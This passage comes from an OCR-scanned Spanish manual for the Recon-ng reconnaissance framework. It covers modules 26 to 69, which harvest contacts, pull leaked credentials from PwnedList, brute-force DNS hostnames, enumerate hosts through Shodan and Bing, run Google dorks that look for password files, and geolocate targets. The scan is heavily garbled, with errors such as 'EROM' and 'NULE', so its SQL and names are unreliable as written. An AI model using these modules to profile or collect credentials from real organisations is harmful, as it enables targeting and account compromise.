default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NUEE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 


26. Meta Data Extractor 

Ruta: modules/recon/domains-contacts/metacrawler.py 






Descripción: Busca archivos asociados con los dominios proporcionados y extrae los metadatos 
relacionados con el contacto. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

EXTRACT 

Ealse 

Si 

extraer metadatos de archivos descubiertos 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Normalmente soporta los tipos de ficheros doc, docx, xls, xlsx, ppt, pptx y pdf. 

27. lANA Prívate Enterprise Number Company-by-Domain Eookup 
Ruta: modules/recon/domains-contacts/pen.py 

Descripción: Dado un dominio, encuentra un contacto en el registro de Número de empresa privada 
(PEN) de la lANA cuya dirección de correo electrónico finaliza con ese dominio. El dominio se 
agrega a la tabla 'domains'. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

28. PGP Key Owner Eookup 

Ruta: modules/recon/domains-contacts/pgp search.py 

Descripción: Busca en el servidor de claves públicas PGP del MIT las direcciones de correo 
electrónico del dominio dado. Actualiza la tabla de 'contacts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Inspiración de thcHarvester.py por Christan Martorella: cmarorella[at]edge-seecurity.com 

29. Whois POC Harvester 

Ruta: modules/recon/domains-contacts/whois_pocs.py 

Descripción: Utiliza el ARIN Whois RWS para recolectar datos POC de consultas whois para el 
dominio dado. Actualiza la tabla de 'contacts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 







Opciones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

30. PwnedList - Aeeount Credentials Eeteher 

Ruta: modules/reeon/domains-eredentials/pwnedlist/aeeount ereds.py 
Keys: pwnedlist_api, pwnedlist_seeret, pwnedlist_iv 

Deseripeión: Consulta en la API PwnedList las eredeneiales asoeiadas eon los nombres de usuario 
dados. Aetualiza la tabla de ’eredentials' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT username EROM eredentials WHERE usemame IS NOT NULE 
and password IS NULE 

<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Costo de eonsulta API: I eonsulta por solieitud y 1 eonsulta por fuga úniea. 

31. PwnedList - API Usage Statisties Eeteher 

Ruta: modules/reeon/domains-eredentials/pwnedlist/api_usage.py 
Keys: pwnedhst_api, pwnedlist_seeret 

Deseripeión: Consulta la API PwnedList para obtener estadistieas de uso de la euenta. 

32. PwnedList - Pwned Domain Credentials Eeteher 

Path: modules/reeon/domains-eredentials/pwnedlist/domain_ereds.py 
Keys: pwnedhst_api, pwnedlist_seeret, pwnedlist_iv 

Deseripeión: Consulta la API PwnedList para obtener todas las eredeneiales para un dominio. 
Aetualiza la tabla de 'eredentials' eon los resultados. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Costo de eonsulta API: 10000 eonsultas por solieitud, 1 eonsulta por eada euenta devuelta y 1 
eonsulta por fuga úniea 

33. PwnedList - Pwned Domain Statisties Eeteher 

Ruta: modules/reeon/domains-eredentials/pwnedlist/domain ispwned.py 

Keys: pwnedhst_api, pwnedlist_seeret 

Deseripeión: Consulta la API de PwnedList para un dominio a determinar si alguna eredeneial 
asoeiada se ha visto eomprometida. Este módulo NO devuelve ninguna eredeneial, solo un número 





total de credenciales comprometidas. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> cadena que representa una sola entrada 
<patii> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Costo de consulta API: 1 consulta por solicitud. 

34. PwnedList - Eeak Details Eetcher 

Ruta: modules/recon/domains-credentials/pwnedlist/leak lookup.py 

Descripción: Consulta la base de datos local para obtener información asociada con una ID de fuga. 
El módulo ’leaks dump' debe usarse para llenar la base de datos local antes de que este módulo se 
ejecute con éxito. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT leak EROM credentials WHERE leak IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

35. PwnedList - Leak Details Retriever 

Ruta: modules/recon/domains-credentials/pwnedlist/leaks dump.py 
Keys: pwnedbst_api, pwnedlist_secret 

Descripción: Consulta la API PwnedList para obtener información asociada con todas las 
filtraciones conocidas. Actualiza la tabla de ’leaks' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT leak id EROM leaks WHERE leak id IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Costo de consulta API: I consulta por solicitud. 

36. DNS Public Suffix Brute Eorcer 

Ruta: modules/recon/domains-domains/brute suflfix.py 

Descripción: Enera bruta de TLDs y SLDs usando DNS. Actualiza la tabla 'domains' con los 
resultados. 

Opciones: 


Nombre 

Valor actual 

Reque 

rido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 







SUEEIXES 

/usr/share/reoon- 
ng/data/ suflfixes .txt 

Si 

Ruta de la lista de palabras al sufijo públioo 


Opciones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* TLDs: https://data.iana.org/TED/tlds-alpha-by-domain.txt 

* SLDs: https://raw.github.oom/gavingmiller/seoond-level-domains/master/SLDs.csv 

37. Bing API Hostname Enumerator 

Ruta: modules/recon/domains-hosts/bing domain api.py 

Keys: bing api 

Descripción: Aprovecha la API de Bing y el operador de búsqueda avanzada "domain:" para 
reooleotar dispositivos. Aotualiza la tabla ’hosts' oon los resultados. 

Opoiones: 


Nombre 

Valor aotual 

Requerido 

Desoripoión 

LIMIT 

0 

Si 

Limitar el número total de solioitudes de 
API (0 = ilimitado) 

SOURCE 

default 

Si 

Origen de entrada 


Opoiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

38. Bing Hostname Enumerator 

Ruta: modules/reoon/domains-hosts/bing domain web.py 

Desoripoión: Reooleota los dispositivos de Bing.eom utilizando el operador de búsqueda 'site'. 
Aetualiza la tabla 'hosts' eon los resultados. 

Opoiones: 


Nombre 

Valor aotual 

Requerido 

Desoripoión 

SOURCE 

default 

Si 

Origen de entrada 


Opoiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

39. DNS Hostname Bruto Eoroer 

Ruta: modules/reoon/domains-hosts/brute_hosts.py 

Desoripoión: Nombres de host de fúerza bruta utilizando DNS. Aotualiza la tabla 'hosts' oon los 
resultados. 

Opoiones: 


Nombre 

Valor aotual 

Requerí 

do 

Desoripoión 

SOURCE 

default 

Si 

Origen de entrada 

WORDLIST 

/usr/share/reoon- 
ng/data/hostnames. txt 

Si 

Ruta a la lista de palabras de 
dispositivos 







Opciones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

40. BuiltWith Enumerator 

Ruta: modules/reeon/domains-hosts/builtwith.py 

Keys: builtwith api 

Deseripeión: Aproveeha la API de BuiltWith para identifiear dispositivos, teenologias y eontaetos 
asoeiados eon un dominio. 

Opeiones: 


Nombre 

Valor aetual 

Requerí 

do 

Deseripeión 

SHOWALL 

True 

Si 

Teenologias de visualizaeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

41. Certifieate Transpareney Seareh 

Ruta: modules/reeon/domains-hosts/eertifieate transpareney.py 

Deseripeión: Busea datos de transpareneia de eertifieados desde ert.sh, agregando los dispositivos 
reeién identifieados a la tabla ‘hosts’ 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

42. EindSubDomains DNS seareh 

Ruta: modules/reeon/domains-hosts/fmdsubdomains.py 

Deseripeión: Consulta la página EindSubDomain para obtener informaeión de subdominio en un 
dominio. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

43. Google Hostname Enumerator 

Ruta: modules/reoon/domains-hosts/google_site_web.py 

Deseripeión: Coseeha dispositivos de Google.eom utilizando el operador de búsqueda 'site'. 






Actualiza la tabla ’hosts' con los resultados. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULL 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que contiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una columna de entradas 

44. HaekerTarget Eookup 

Ruta: modules/reeon/domains-hosts/hackertarget.py 

Descripeión: Utiliza la API HackerTarget.eom para buscar nombres de dispositivo. Actualiza la 
tabla ’hosts' con los resultados. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una columna de entradas 

45. Malí eXehange (MX) and Sender Poliey Eramework (SPE) Record Retriever 
Ruta: modules/recon/domains-hosts/mx spf ip.py 

Descripción: Recupera los registros MX y SPE IPv4 para un dominio. Actualiza las tablas ’hosts' y / 
o ’netblocks' con los resultados. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Este módulo lee los dominios de la tabla de dominios y reeupera los nombres de dispositivo de 
los registros MX asoeiados eon cada dominio. Los nombres de dispositivo se almaeenan en la tabla 
‘hosts’. También recupera las direeeiones IP y/o los bloques de red de los registros SPE asociados 
con cada dominio. Las direcciones se almacenan en la tabla ‘hosts’ y/o ‘netbloeks’. 

46. Netcraft Hostname Enumerator 

Ruta: modules/reeon/domains-hosts/neteraft.py 

Descripeión: Cosecha dispositivos de Netcraft.com. Actualiza la tabla 'hosts' con los resultados. 
Opeiones: 


Nombre 

Valor actual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULL 
<string> eadena que representa una sola entrada 







<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

47. Shodan Hostname Enumerator 

Ruta: modules/reeon/domains-hosts/shodan hostname.py 

Keys: shodan api 

Deseripeión: Coseeha los dispositivos de la API de Shodan utilizando el operador de búsqueda 
'hostname'. Aetualiza la tabla 'hosts' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

LIMIT 

1 

Si 

Limite de solieitudes de API por fuente de entrada 
(0 = ilimitado) 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

48. SSE SAN Eookup 

Ruta: modules/reeon/domains-hosts/ssl_san.py 

Deseripeión: Utiliza la API ssltools.eom para obtener los Subject Altemative Ñames para un 
dominio. Aetualiza la tabla 'hosts' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que contiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

49. ThreatCrowd DNS lookup 

Ruta: modules/reeon/domains-hosts/threaterowd.py 

Deseripeión: Aproveeha la API de DNS pasiva ThreatCrowd para deseubrir dispositivos/ 
subdominios. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

50. ThreatMiner DNS lookup 

Ruta: modules/reeon/domains-hosts/threatminer.py 

Deseripeión: Usar ThreatMiner API para descubrir subdominios. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 







SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen; 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

51. Google Haeking Database 

Ruta: modules/reeon/domains-vulnerabilities/ghdb.py 

Deseripeión: Busca posibles vulnerabilidades en un dominio aproveehando la base de datos de 
pirateo de Google (GHDB) y el operador de búsqueda 'site'. Aetualiza la tabla de 'vulnerabilities' 
eon los resultados. 

Opciones: 


Nombre 

Valor 

aetual 

Reque 

rido 

Deseripeión 

DORKS 


No 

Arehivo que eontiene una lista 
alternativa de Google Dorks 

GHDB ADVISORIES AND VULNE 
RABIEITIES 

False 

Si 

Aetivar / desaetivar los dorks de 1996 
en esta eategoria 

GHDB ADVISORIES AND VUENE 
RABIEITIES 

False 

Si 


GHDBERRORMESSAGES 

False 

Si 

Aetivar / desaetivar los 93 dorks en esta 
eategoria 

GHDB EILES CONTAINING JUIC 
YINEO 

False 

Si 

Habilitar / deshabilitar los 366 dorks en 
esta eategoria 

GHDB EILES CONTAINING PASS 
WORDS 

False 

Si 

Habilitar / deshabilitar los 199 dorks en 
esta eategoria 

GHDB EILES CONTAINING USER 
ÑAMES 

False 

Si 

Habilitar / deshabilitar los 17 dorks en 
esta eategoria 

GHDBEOOTHOLDS 

False 

Si 

Habilitar / deshabilitar los 49 dorks en 
esta eategoria 

GHDB NETWORK OR VULNERA 
BILITYDATA 

False 

Si 

Habilitar / deshabilitar los 63 dorks en 
esta eategoria 

GHDB PAGES CONTAINING LOG 
INPORTALS 

False 

Si 

Habilitar / deshabilitar los 372 dorks en 
esta eategoria 

GHDBSENSITIVEDIRECTORIES 

False 

Si 

Habilitar / deshabilitar los 119 dorks en 
esta eategoria 

GHDB SENSITIVE ONLINE SHOP 
PINGINFO 

False 

Si 

Habilitar / deshabilitar los 11 dorks en 
esta eategoria 

GHDB VARIOUS ONLINE DEVIC 
ES 

False 

Si 

Habilitar / deshabilitar los 307 dorks en 
esta eategoria 

GHDBVULNERABLEFILES 

False 

Si 

Habilitar / deshabilitar los 62 dorks en 
esta eategoria 

GHDBVULNERABLESERVERS 

False 

Si 

Habilitar / deshabilitar los 83 dorks en 
esta eategoria 

GHDB WEB SERVER DETECTIO 

N 

False 

Si 

Habilitar / deshabilitar los 77 dorks en 
esta eategoria 





SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 


default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Ea seguridad ofensiva ya no proporeiona aeeeso a GHDB para Reeon-ng. Ea lista ineluida se 
aetualizó por última vez el 8/1/2016. 

52. PunkSPIDER Vulnerabilty Einder 

Ruta: modules/reeon/domains-vulnerabilities/punkspider.py 

Deseripeión: Aproveeha la API de PunkSPIDER para busear vulnerabilidades deseubiertas 
previamente en los dispositivos dentro de un dominio. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

53. XSSed Domain Lookup 

Ruta: modules/reeon/domains-vulnerabilities/xssed.py 

Deseripeión: Verifica en XSSed.eom los registros XSS asoeiados con un dominio y muestra los 
primeros 20 resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que contiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

54. XSSposed Domain Lookup 

Ruta: modules/reeon/domains-vulnerabilities/xssposed.py 

Deseripeión: Verifiea en XSSposed.eom los registros XSS asoeiados eon un dominio. 
Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT domain EROM domains WHERE domain IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

55. Hosts to Domains Data Migrator 

Ruta: modules/reoon/hosts-domains/migrate_hosts.py 

Deseripeión: Agrega un nuevo dominio para todos los nombres de dispositivo almacenados en la 







tabla ’hosts'. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT host EROM hosts WHERE host IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Este módulo considera que todo después del primer elemento podría contener otros dispositivos 
además del actual. Por lo tanto los dispositivos > 2 dominios profundos crearán dominios > 2 
elementos de longitud. 

56. Bing API IP Neighbor Enumerator 
Ruta: modules/recon/hosts-hosts/bing_ip.py 
Keys: bing api 

Descripción: Aprovecha la API de Bing y el operador de búsqueda avanzada "ip:" para enumerar 
otros dispositivos virtuales que comparten la misma dirección IP. Actualiza la tabla 'hosts' con los 
resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

RESTRICT 

Truc 

Si 

Restringir los dispositivos agregados a 
los dominios actuales 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NUEE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Este módulo solo almacena los dispositivos cuyo dominio coincide con una entrada en la tabla 
de dominios. 

57. IPInfoDB GeoIP 

Ruta: modules/recon/hosts-hosts/ipinfodb.py 
Keys: ipinfodb_api 

Descripción: Aprovecha la API ipinfodb.com para geolocalizar un dispositivo por dirección IP 
Actualiza la tabla 'hosts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

58. ipstack 

Ruta: modules/recon/hosts-hosts/ipstack.py 
Keys: ipstack api 






Descripción: Aprovecha la API de ipstack.com para geolocalizar un dispositivo por dirección IR 
Actualiza la tabla ’hosts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

59. Hostname Resolver 

Ruta: modules/recon/hosts-hosts/resolve.py 

Descripción: Resuelve la dirección IR de un dispositivo. Actualiza la tabla 'hosts' con los 
resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT host EROM hosts WHERE host IS NOT NULE AND ip address 
IS NULE 

<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Nota: El nombre del servidor debe ser en forma IR 

60. Reverse Resolver 

Ruta: modules/recon/hosts-hosts/reverse_resolve.py 

Descripción: Realiza una búsqueda inversa para cada dirección IR para resolver el nombre del 
dispositivo. Actualiza la tabla 'hosts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

61. SSLTools.com Host Ñame Lookups 
Ruta: modules/recon/hosts-hosts/ssltools.py 

Descripción: Utiliza el sitio ssltools.com para obtener nombres de los dispositivos de los metadatos 
del certificado SSL de un sitio para actualizar la tabla 'hosts'. Los problemas de seguridad con la 
confianza del certificado se envian a la tabla de 'vulnerabilities'. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

RESTRICT 

Truc 

Si 

Restringir los dispositivos agregados a los 
dominios actuales 

SOURCE 

default 

Si 

Origen de entrada 







Opciones del origen: 

default SELECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Este módulo solo almaeena los dispositivos euyo dominio eoineide eon una entrada en la tabla 
de dominios. 

62. Virustotal domains extraetor 

Ruta: modules/reeon/hosts-hosts/virustotal.py 

Keys: virustotal api 

Deseripeión: Coseeha dominios de Virustotal utilizando la API de informes. Aetualiza la tabla 
'hosts' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

INTERVAL 

15 

Si 

Intervalo en segundos entre solieitudes de API 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

63. Hosts to Loeations Data Migrator 

Ruta: modules/reeon/hosts-loeations/migrate hosts.py 

Deseripeión: Agrega una nueva ubieaeión para todas las ubieaeiones almaeenadas en la tabla 
'hosts'. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT latitude, longitude EROM hosts WHERE latitude IS NOT NULE 
AND longitude IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

64. Shodan IP Enumerator 

Ruta: modules/reeon/hosts-ports/shodan ip.py 

Keys: shodan api 

Deseripeión: Coseeha la informaeión del puerto de la API de Shodan utilizando el operador de 
búsqueda 'ip'. Aetualiza la tabla de 'ports' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

LIMIT 

1 

Si 

Limite de solieitudes de API por fuente de 
entrada (0 = ilimitado) 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT ip address EROM hosts WHERE ip address IS NOT NULE 
<string> eadena que representa una sola entrada 






<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

65. Address Geoeoder 

Ruta: modules/reeon/loeations-loeations/geoeode.py 
Keys: google api 

Deseripeión: Consulta la API de Google Maps para obtener eoordenadas para una direeeión. 
Aetuabza la tabla de ’loeations' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT street address EROM loeations WHERE street address IS NOT 
NUEE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

66. Reverse Geoeoder 

Ruta: modules/reeon/loeations-loeations/reverse geoeode.py 
Keys: google api 

Deseripeión: Consulta la API de Google Maps para obtener una direeeión de las eoordenadas. 
Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT latitude H longitude EROM loeations WHERE latitude IS 
NOT NUEE AND longitude IS NOT NUEE 
<string> eadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

67. Eliekr Geoloeation Seareh 

Ruta: modules/reeon/loeations-pushpins/fliekr.py 

Keys: fliekr api 

Deseripeión: Busea en Eliekr los medios en la proximidad espeeifieada a una ubieaeión. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Deseripeión 

RADIUS 

1 

Si 

Radio en kilómetros 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT latitude H longitude EROM loeations WHERE latitude IS 
NOT NUEE AND longitude IS NOT NUEE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que contiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Radius must be greater than zero and less than 32 kilometers. 

68. Shodan Geoloeation Seareh 

Ruta: modules/reeon/loeations-pushpins/shodan.py 






Keys: shodan api 

Descripción: Busca en Shodan los medios en la proximidad especificada a una ubicación. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

EIMIT 

1 

Si 

limite de solicitudes de API por fuente de 
entrada (0 = ilimitado) 

RADIUS 

1 

Si 

Radio en kilómetros 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT latitude Hlongitude EROM locations WHERE latitude IS 
NOT NUEE AND longitude IS NOT NULL 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Eas búsquedas ’geo' de Shodan pueden tardar mucho tiempo en completarse. Si recibe errores 
tiempo de espera de conexión, aumentar la opción global SOCKET TIMEOUT. 

69. Twitter Geolocation Search 

